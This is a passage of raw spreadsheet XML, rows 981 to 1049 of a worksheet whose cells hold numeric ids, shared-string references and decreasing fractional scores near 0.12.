      <c r="A981" s="1">
        <v>31383.0</v>
      </c>
      <c r="B981" s="2">
        <v>4998035.0</v>
      </c>
      <c r="C981" s="2" t="s">
        <v>868</v>
      </c>
      <c r="D981" s="2">
        <v>1.0</v>
      </c>
      <c r="E981" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F981" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="982" ht="15.75" customHeight="1">
      <c r="A982" s="1">
        <v>30232.0</v>
      </c>
      <c r="B982" s="2">
        <v>3.7432852E7</v>
      </c>
      <c r="C982" s="2" t="s">
        <v>869</v>
      </c>
      <c r="D982" s="2">
        <v>1.0</v>
      </c>
      <c r="E982" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F982" s="2">
        <v>0.1253753753753754</v>
      </c>
    </row>
    <row r="983" ht="15.75" customHeight="1">
      <c r="A983" s="1">
        <v>21961.0</v>
      </c>
      <c r="B983" s="2">
        <v>2.9022828E7</v>
      </c>
      <c r="C983" s="2" t="s">
        <v>870</v>
      </c>
      <c r="D983" s="2">
        <v>1.0</v>
      </c>
      <c r="E983" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F983" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="984" ht="15.75" customHeight="1">
      <c r="A984" s="1">
        <v>28854.0</v>
      </c>
      <c r="B984" s="2">
        <v>2.9022827E7</v>
      </c>
      <c r="C984" s="2" t="s">
        <v>871</v>
      </c>
      <c r="D984" s="2">
        <v>1.0</v>
      </c>
      <c r="E984" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F984" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="985" ht="15.75" customHeight="1">
      <c r="A985" s="1">
        <v>22937.0</v>
      </c>
      <c r="B985" s="2">
        <v>4.8721783E7</v>
      </c>
      <c r="C985" s="2" t="s">
        <v>872</v>
      </c>
      <c r="D985" s="2">
        <v>1.0</v>
      </c>
      <c r="E985" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F985" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="986" ht="15.75" customHeight="1">
      <c r="A986" s="1">
        <v>26168.0</v>
      </c>
      <c r="B986" s="2">
        <v>1.6098932E7</v>
      </c>
      <c r="C986" s="2" t="s">
        <v>873</v>
      </c>
      <c r="D986" s="2">
        <v>1.0</v>
      </c>
      <c r="E986" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F986" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="987" ht="15.75" customHeight="1">
      <c r="A987" s="1">
        <v>14923.0</v>
      </c>
      <c r="B987" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C987" s="2" t="s">
        <v>874</v>
      </c>
      <c r="D987" s="2">
        <v>1.0</v>
      </c>
      <c r="E987" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F987" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="988" ht="15.75" customHeight="1">
      <c r="A988" s="1">
        <v>15579.0</v>
      </c>
      <c r="B988" s="2">
        <v>4.3440893E7</v>
      </c>
      <c r="C988" s="2" t="s">
        <v>875</v>
      </c>
      <c r="D988" s="2">
        <v>1.0</v>
      </c>
      <c r="E988" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F988" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="989" ht="15.75" customHeight="1">
      <c r="A989" s="1">
        <v>21381.0</v>
      </c>
      <c r="B989" s="2">
        <v>2.1678861E7</v>
      </c>
      <c r="C989" s="2" t="s">
        <v>876</v>
      </c>
      <c r="D989" s="2">
        <v>1.0</v>
      </c>
      <c r="E989" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F989" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="990" ht="15.75" customHeight="1">
      <c r="A990" s="1">
        <v>29643.0</v>
      </c>
      <c r="B990" s="2">
        <v>3.3800262E7</v>
      </c>
      <c r="C990" s="2" t="s">
        <v>877</v>
      </c>
      <c r="D990" s="2">
        <v>1.0</v>
      </c>
      <c r="E990" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F990" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="991" ht="15.75" customHeight="1">
      <c r="A991" s="1">
        <v>22389.0</v>
      </c>
      <c r="B991" s="2">
        <v>3.5351507E7</v>
      </c>
      <c r="C991" s="2" t="s">
        <v>878</v>
      </c>
      <c r="D991" s="2">
        <v>1.0</v>
      </c>
      <c r="E991" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F991" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="992" ht="15.75" customHeight="1">
      <c r="A992" s="1">
        <v>4700.0</v>
      </c>
      <c r="B992" s="2">
        <v>4.3251682E7</v>
      </c>
      <c r="C992" s="2" t="s">
        <v>879</v>
      </c>
      <c r="D992" s="2">
        <v>1.0</v>
      </c>
      <c r="E992" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F992" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="993" ht="15.75" customHeight="1">
      <c r="A993" s="1">
        <v>28886.0</v>
      </c>
      <c r="B993" s="2">
        <v>2.9242847E7</v>
      </c>
      <c r="C993" s="2" t="s">
        <v>880</v>
      </c>
      <c r="D993" s="2">
        <v>1.0</v>
      </c>
      <c r="E993" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F993" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="994" ht="15.75" customHeight="1">
      <c r="A994" s="1">
        <v>29059.0</v>
      </c>
      <c r="B994" s="2">
        <v>3.0256041E7</v>
      </c>
      <c r="C994" s="2" t="s">
        <v>881</v>
      </c>
      <c r="D994" s="2">
        <v>1.0</v>
      </c>
      <c r="E994" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F994" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="995" ht="15.75" customHeight="1">
      <c r="A995" s="1">
        <v>14707.0</v>
      </c>
      <c r="B995" s="2">
        <v>4.0602502E7</v>
      </c>
      <c r="C995" s="2" t="s">
        <v>882</v>
      </c>
      <c r="D995" s="2">
        <v>1.0</v>
      </c>
      <c r="E995" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F995" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="996" ht="15.75" customHeight="1">
      <c r="A996" s="1">
        <v>20426.0</v>
      </c>
      <c r="B996" s="2">
        <v>1.2312944E7</v>
      </c>
      <c r="C996" s="2" t="s">
        <v>883</v>
      </c>
      <c r="D996" s="2">
        <v>1.0</v>
      </c>
      <c r="E996" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F996" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="997" ht="15.75" customHeight="1">
      <c r="A997" s="1">
        <v>21342.0</v>
      </c>
      <c r="B997" s="2">
        <v>2.1171645E7</v>
      </c>
      <c r="C997" s="2" t="s">
        <v>884</v>
      </c>
      <c r="D997" s="2">
        <v>1.0</v>
      </c>
      <c r="E997" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F997" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="998" ht="15.75" customHeight="1">
      <c r="A998" s="1">
        <v>21680.0</v>
      </c>
      <c r="B998" s="2">
        <v>2.5054797E7</v>
      </c>
      <c r="C998" s="2" t="s">
        <v>885</v>
      </c>
      <c r="D998" s="2">
        <v>1.0</v>
      </c>
      <c r="E998" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F998" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="999" ht="15.75" customHeight="1">
      <c r="A999" s="1">
        <v>24563.0</v>
      </c>
      <c r="B999" s="2">
        <v>1.1301177E7</v>
      </c>
      <c r="C999" s="2" t="s">
        <v>886</v>
      </c>
      <c r="D999" s="2">
        <v>1.0</v>
      </c>
      <c r="E999" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F999" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="1000" ht="15.75" customHeight="1">
      <c r="A1000" s="1">
        <v>28024.0</v>
      </c>
      <c r="B1000" s="2">
        <v>2.439101E7</v>
      </c>
      <c r="C1000" s="2" t="s">
        <v>887</v>
      </c>
      <c r="D1000" s="2">
        <v>1.0</v>
      </c>
      <c r="E1000" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1000" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="1001" ht="15.75" customHeight="1">
      <c r="A1001" s="1">
        <v>29745.0</v>
      </c>
      <c r="B1001" s="2">
        <v>3.4668819E7</v>
      </c>
      <c r="C1001" s="2" t="s">
        <v>888</v>
      </c>
      <c r="D1001" s="2">
        <v>1.0</v>
      </c>
      <c r="E1001" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1001" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="1002" ht="15.75" customHeight="1">
      <c r="A1002" s="1">
        <v>30247.0</v>
      </c>
      <c r="B1002" s="2">
        <v>3.7548039E7</v>
      </c>
      <c r="C1002" s="2" t="s">
        <v>889</v>
      </c>
      <c r="D1002" s="2">
        <v>1.0</v>
      </c>
      <c r="E1002" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1002" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="1003" ht="15.75" customHeight="1">
      <c r="A1003" s="1">
        <v>30303.0</v>
      </c>
      <c r="B1003" s="2">
        <v>3.7927618E7</v>
      </c>
      <c r="C1003" s="2" t="s">
        <v>890</v>
      </c>
      <c r="D1003" s="2">
        <v>1.0</v>
      </c>
      <c r="E1003" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1003" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="1004" ht="15.75" customHeight="1">
      <c r="A1004" s="1">
        <v>10453.0</v>
      </c>
      <c r="B1004" s="2">
        <v>1.0626375E7</v>
      </c>
      <c r="C1004" s="2" t="s">
        <v>891</v>
      </c>
      <c r="D1004" s="2">
        <v>1.0</v>
      </c>
      <c r="E1004" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1004" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1005" ht="15.75" customHeight="1">
      <c r="A1005" s="1">
        <v>23220.0</v>
      </c>
      <c r="B1005" s="2">
        <v>5.2772841E7</v>
      </c>
      <c r="C1005" s="2" t="s">
        <v>892</v>
      </c>
      <c r="D1005" s="2">
        <v>1.0</v>
      </c>
      <c r="E1005" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1005" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1006" ht="15.75" customHeight="1">
      <c r="A1006" s="1">
        <v>24108.0</v>
      </c>
      <c r="B1006" s="2">
        <v>9866128.0</v>
      </c>
      <c r="C1006" s="2" t="s">
        <v>893</v>
      </c>
      <c r="D1006" s="2">
        <v>1.0</v>
      </c>
      <c r="E1006" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1006" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1007" ht="15.75" customHeight="1">
      <c r="A1007" s="1">
        <v>25856.0</v>
      </c>
      <c r="B1007" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C1007" s="2" t="s">
        <v>894</v>
      </c>
      <c r="D1007" s="2">
        <v>1.0</v>
      </c>
      <c r="E1007" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1007" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1008" ht="15.75" customHeight="1">
      <c r="A1008" s="1">
        <v>26198.0</v>
      </c>
      <c r="B1008" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C1008" s="2" t="s">
        <v>895</v>
      </c>
      <c r="D1008" s="2">
        <v>1.0</v>
      </c>
      <c r="E1008" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1008" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1009" ht="15.75" customHeight="1">
      <c r="A1009" s="1">
        <v>27180.0</v>
      </c>
      <c r="B1009" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C1009" s="2" t="s">
        <v>896</v>
      </c>
      <c r="D1009" s="2">
        <v>1.0</v>
      </c>
      <c r="E1009" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1009" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1010" ht="15.75" customHeight="1">
      <c r="A1010" s="1">
        <v>30224.0</v>
      </c>
      <c r="B1010" s="2">
        <v>3.7402448E7</v>
      </c>
      <c r="C1010" s="2" t="s">
        <v>897</v>
      </c>
      <c r="D1010" s="2">
        <v>1.0</v>
      </c>
      <c r="E1010" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1010" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1011" ht="15.75" customHeight="1">
      <c r="A1011" s="1">
        <v>31018.0</v>
      </c>
      <c r="B1011" s="2">
        <v>4774686.0</v>
      </c>
      <c r="C1011" s="2" t="s">
        <v>898</v>
      </c>
      <c r="D1011" s="2">
        <v>1.0</v>
      </c>
      <c r="E1011" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1011" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="1012" ht="15.75" customHeight="1">
      <c r="A1012" s="1">
        <v>22505.0</v>
      </c>
      <c r="B1012" s="2">
        <v>3.7375955E7</v>
      </c>
      <c r="C1012" s="2" t="s">
        <v>899</v>
      </c>
      <c r="D1012" s="2">
        <v>1.0</v>
      </c>
      <c r="E1012" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1012" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="1013" ht="15.75" customHeight="1">
      <c r="A1013" s="1">
        <v>29551.0</v>
      </c>
      <c r="B1013" s="2">
        <v>3.3089137E7</v>
      </c>
      <c r="C1013" s="2" t="s">
        <v>900</v>
      </c>
      <c r="D1013" s="2">
        <v>1.0</v>
      </c>
      <c r="E1013" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1013" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="1014" ht="15.75" customHeight="1">
      <c r="A1014" s="1">
        <v>30998.0</v>
      </c>
      <c r="B1014" s="2">
        <v>4.7602007E7</v>
      </c>
      <c r="C1014" s="2" t="s">
        <v>901</v>
      </c>
      <c r="D1014" s="2">
        <v>1.0</v>
      </c>
      <c r="E1014" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1014" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="1015" ht="15.75" customHeight="1">
      <c r="A1015" s="1">
        <v>143.0</v>
      </c>
      <c r="B1015" s="2">
        <v>1.3584987E7</v>
      </c>
      <c r="C1015" s="2" t="s">
        <v>902</v>
      </c>
      <c r="D1015" s="2">
        <v>1.0</v>
      </c>
      <c r="E1015" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1015" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1016" ht="15.75" customHeight="1">
      <c r="A1016" s="1">
        <v>5133.0</v>
      </c>
      <c r="B1016" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C1016" s="2" t="s">
        <v>903</v>
      </c>
      <c r="D1016" s="2">
        <v>1.0</v>
      </c>
      <c r="E1016" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1016" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1017" ht="15.75" customHeight="1">
      <c r="A1017" s="1">
        <v>7172.0</v>
      </c>
      <c r="B1017" s="2">
        <v>5.0526878E7</v>
      </c>
      <c r="C1017" s="2" t="s">
        <v>904</v>
      </c>
      <c r="D1017" s="2">
        <v>1.0</v>
      </c>
      <c r="E1017" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1017" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1018" ht="15.75" customHeight="1">
      <c r="A1018" s="1">
        <v>7288.0</v>
      </c>
      <c r="B1018" s="2">
        <v>5.0798178E7</v>
      </c>
      <c r="C1018" s="2" t="s">
        <v>905</v>
      </c>
      <c r="D1018" s="2">
        <v>1.0</v>
      </c>
      <c r="E1018" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1018" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1019" ht="15.75" customHeight="1">
      <c r="A1019" s="1">
        <v>8750.0</v>
      </c>
      <c r="B1019" s="2">
        <v>5.4550051E7</v>
      </c>
      <c r="C1019" s="2" t="s">
        <v>906</v>
      </c>
      <c r="D1019" s="2">
        <v>1.0</v>
      </c>
      <c r="E1019" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1019" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1020" ht="15.75" customHeight="1">
      <c r="A1020" s="1">
        <v>9719.0</v>
      </c>
      <c r="B1020" s="2">
        <v>5.6415398E7</v>
      </c>
      <c r="C1020" s="2" t="s">
        <v>907</v>
      </c>
      <c r="D1020" s="2">
        <v>1.0</v>
      </c>
      <c r="E1020" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1020" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1021" ht="15.75" customHeight="1">
      <c r="A1021" s="1">
        <v>10555.0</v>
      </c>
      <c r="B1021" s="2">
        <v>1.2677226E7</v>
      </c>
      <c r="C1021" s="2" t="s">
        <v>908</v>
      </c>
      <c r="D1021" s="2">
        <v>1.0</v>
      </c>
      <c r="E1021" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1021" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1022" ht="15.75" customHeight="1">
      <c r="A1022" s="1">
        <v>11596.0</v>
      </c>
      <c r="B1022" s="2">
        <v>2.2916007E7</v>
      </c>
      <c r="C1022" s="2" t="s">
        <v>909</v>
      </c>
      <c r="D1022" s="2">
        <v>1.0</v>
      </c>
      <c r="E1022" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1022" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1023" ht="15.75" customHeight="1">
      <c r="A1023" s="1">
        <v>14384.0</v>
      </c>
      <c r="B1023" s="2">
        <v>3903249.0</v>
      </c>
      <c r="C1023" s="2" t="s">
        <v>910</v>
      </c>
      <c r="D1023" s="2">
        <v>1.0</v>
      </c>
      <c r="E1023" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1023" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1024" ht="15.75" customHeight="1">
      <c r="A1024" s="1">
        <v>16586.0</v>
      </c>
      <c r="B1024" s="2">
        <v>4.692629E7</v>
      </c>
      <c r="C1024" s="2" t="s">
        <v>911</v>
      </c>
      <c r="D1024" s="2">
        <v>1.0</v>
      </c>
      <c r="E1024" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1024" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1025" ht="15.75" customHeight="1">
      <c r="A1025" s="1">
        <v>17333.0</v>
      </c>
      <c r="B1025" s="2">
        <v>4.9378473E7</v>
      </c>
      <c r="C1025" s="2" t="s">
        <v>912</v>
      </c>
      <c r="D1025" s="2">
        <v>1.0</v>
      </c>
      <c r="E1025" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1025" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1026" ht="15.75" customHeight="1">
      <c r="A1026" s="1">
        <v>17551.0</v>
      </c>
      <c r="B1026" s="2">
        <v>5.0205538E7</v>
      </c>
      <c r="C1026" s="2" t="s">
        <v>913</v>
      </c>
      <c r="D1026" s="2">
        <v>1.0</v>
      </c>
      <c r="E1026" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1026" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1027" ht="15.75" customHeight="1">
      <c r="A1027" s="1">
        <v>18379.0</v>
      </c>
      <c r="B1027" s="2">
        <v>5.2582541E7</v>
      </c>
      <c r="C1027" s="2" t="s">
        <v>914</v>
      </c>
      <c r="D1027" s="2">
        <v>1.0</v>
      </c>
      <c r="E1027" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1027" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1028" ht="15.75" customHeight="1">
      <c r="A1028" s="1">
        <v>18443.0</v>
      </c>
      <c r="B1028" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C1028" s="2" t="s">
        <v>915</v>
      </c>
      <c r="D1028" s="2">
        <v>1.0</v>
      </c>
      <c r="E1028" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1028" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1029" ht="15.75" customHeight="1">
      <c r="A1029" s="1">
        <v>19363.0</v>
      </c>
      <c r="B1029" s="2">
        <v>5.5467989E7</v>
      </c>
      <c r="C1029" s="2" t="s">
        <v>916</v>
      </c>
      <c r="D1029" s="2">
        <v>1.0</v>
      </c>
      <c r="E1029" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1029" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1030" ht="15.75" customHeight="1">
      <c r="A1030" s="1">
        <v>20306.0</v>
      </c>
      <c r="B1030" s="2">
        <v>1.1343019E7</v>
      </c>
      <c r="C1030" s="2" t="s">
        <v>917</v>
      </c>
      <c r="D1030" s="2">
        <v>1.0</v>
      </c>
      <c r="E1030" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1030" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1031" ht="15.75" customHeight="1">
      <c r="A1031" s="1">
        <v>20461.0</v>
      </c>
      <c r="B1031" s="2">
        <v>1.2686041E7</v>
      </c>
      <c r="C1031" s="2" t="s">
        <v>918</v>
      </c>
      <c r="D1031" s="2">
        <v>1.0</v>
      </c>
      <c r="E1031" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1031" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1032" ht="15.75" customHeight="1">
      <c r="A1032" s="1">
        <v>20702.0</v>
      </c>
      <c r="B1032" s="2">
        <v>1.4541547E7</v>
      </c>
      <c r="C1032" s="2" t="s">
        <v>919</v>
      </c>
      <c r="D1032" s="2">
        <v>1.0</v>
      </c>
      <c r="E1032" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1032" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1033" ht="15.75" customHeight="1">
      <c r="A1033" s="1">
        <v>20773.0</v>
      </c>
      <c r="B1033" s="2">
        <v>1.4972946E7</v>
      </c>
      <c r="C1033" s="2" t="s">
        <v>867</v>
      </c>
      <c r="D1033" s="2">
        <v>1.0</v>
      </c>
      <c r="E1033" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1033" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1034" ht="15.75" customHeight="1">
      <c r="A1034" s="1">
        <v>21066.0</v>
      </c>
      <c r="B1034" s="2">
        <v>1.7856091E7</v>
      </c>
      <c r="C1034" s="2" t="s">
        <v>920</v>
      </c>
      <c r="D1034" s="2">
        <v>1.0</v>
      </c>
      <c r="E1034" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1034" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1035" ht="15.75" customHeight="1">
      <c r="A1035" s="1">
        <v>21088.0</v>
      </c>
      <c r="B1035" s="2">
        <v>1.8048645E7</v>
      </c>
      <c r="C1035" s="2" t="s">
        <v>921</v>
      </c>
      <c r="D1035" s="2">
        <v>1.0</v>
      </c>
      <c r="E1035" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1035" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1036" ht="15.75" customHeight="1">
      <c r="A1036" s="1">
        <v>21288.0</v>
      </c>
      <c r="B1036" s="2">
        <v>2.0483763E7</v>
      </c>
      <c r="C1036" s="2" t="s">
        <v>922</v>
      </c>
      <c r="D1036" s="2">
        <v>1.0</v>
      </c>
      <c r="E1036" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1036" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1037" ht="15.75" customHeight="1">
      <c r="A1037" s="1">
        <v>21648.0</v>
      </c>
      <c r="B1037" s="2">
        <v>2.4819591E7</v>
      </c>
      <c r="C1037" s="2" t="s">
        <v>921</v>
      </c>
      <c r="D1037" s="2">
        <v>1.0</v>
      </c>
      <c r="E1037" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1037" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1038" ht="15.75" customHeight="1">
      <c r="A1038" s="1">
        <v>21874.0</v>
      </c>
      <c r="B1038" s="2">
        <v>2.7574068E7</v>
      </c>
      <c r="C1038" s="2" t="s">
        <v>923</v>
      </c>
      <c r="D1038" s="2">
        <v>1.0</v>
      </c>
      <c r="E1038" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1038" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1039" ht="15.75" customHeight="1">
      <c r="A1039" s="1">
        <v>22004.0</v>
      </c>
      <c r="B1039" s="2">
        <v>2.9799171E7</v>
      </c>
      <c r="C1039" s="2" t="s">
        <v>924</v>
      </c>
      <c r="D1039" s="2">
        <v>1.0</v>
      </c>
      <c r="E1039" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1039" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1040" ht="15.75" customHeight="1">
      <c r="A1040" s="1">
        <v>22142.0</v>
      </c>
      <c r="B1040" s="2">
        <v>3.1162647E7</v>
      </c>
      <c r="C1040" s="2" t="s">
        <v>925</v>
      </c>
      <c r="D1040" s="2">
        <v>1.0</v>
      </c>
      <c r="E1040" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1040" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1041" ht="15.75" customHeight="1">
      <c r="A1041" s="1">
        <v>22736.0</v>
      </c>
      <c r="B1041" s="2">
        <v>4.4029817E7</v>
      </c>
      <c r="C1041" s="2" t="s">
        <v>926</v>
      </c>
      <c r="D1041" s="2">
        <v>1.0</v>
      </c>
      <c r="E1041" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1041" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1042" ht="15.75" customHeight="1">
      <c r="A1042" s="1">
        <v>22765.0</v>
      </c>
      <c r="B1042" s="2">
        <v>4.4822021E7</v>
      </c>
      <c r="C1042" s="2" t="s">
        <v>927</v>
      </c>
      <c r="D1042" s="2">
        <v>1.0</v>
      </c>
      <c r="E1042" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1042" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1043" ht="15.75" customHeight="1">
      <c r="A1043" s="1">
        <v>22791.0</v>
      </c>
      <c r="B1043" s="2">
        <v>4.5447414E7</v>
      </c>
      <c r="C1043" s="2" t="s">
        <v>928</v>
      </c>
      <c r="D1043" s="2">
        <v>1.0</v>
      </c>
      <c r="E1043" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1043" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1044" ht="15.75" customHeight="1">
      <c r="A1044" s="1">
        <v>23034.0</v>
      </c>
      <c r="B1044" s="2">
        <v>5.0091287E7</v>
      </c>
      <c r="C1044" s="2" t="s">
        <v>929</v>
      </c>
      <c r="D1044" s="2">
        <v>1.0</v>
      </c>
      <c r="E1044" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1044" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1045" ht="15.75" customHeight="1">
      <c r="A1045" s="1">
        <v>23441.0</v>
      </c>
      <c r="B1045" s="2">
        <v>5669242.0</v>
      </c>
      <c r="C1045" s="2" t="s">
        <v>930</v>
      </c>
      <c r="D1045" s="2">
        <v>1.0</v>
      </c>
      <c r="E1045" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1045" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1046" ht="15.75" customHeight="1">
      <c r="A1046" s="1">
        <v>23604.0</v>
      </c>
      <c r="B1046" s="2">
        <v>6396211.0</v>
      </c>
      <c r="C1046" s="2" t="s">
        <v>931</v>
      </c>
      <c r="D1046" s="2">
        <v>1.0</v>
      </c>
      <c r="E1046" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1046" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1047" ht="15.75" customHeight="1">
      <c r="A1047" s="1">
        <v>23663.0</v>
      </c>
      <c r="B1047" s="2">
        <v>6838545.0</v>
      </c>
      <c r="C1047" s="2" t="s">
        <v>932</v>
      </c>
      <c r="D1047" s="2">
        <v>1.0</v>
      </c>
      <c r="E1047" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1047" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1048" ht="15.75" customHeight="1">
      <c r="A1048" s="1">
        <v>24102.0</v>
      </c>
      <c r="B1048" s="2">
        <v>9849652.0</v>
      </c>
      <c r="C1048" s="2" t="s">
        <v>933</v>
      </c>
      <c r="D1048" s="2">
        <v>1.0</v>
      </c>
      <c r="E1048" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1048" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="1049" ht="15.75" customHeight="1">
      <c r="A1049" s="1">
        <v>24381.0</v>
      </c>
      <c r="B1049" s="2">
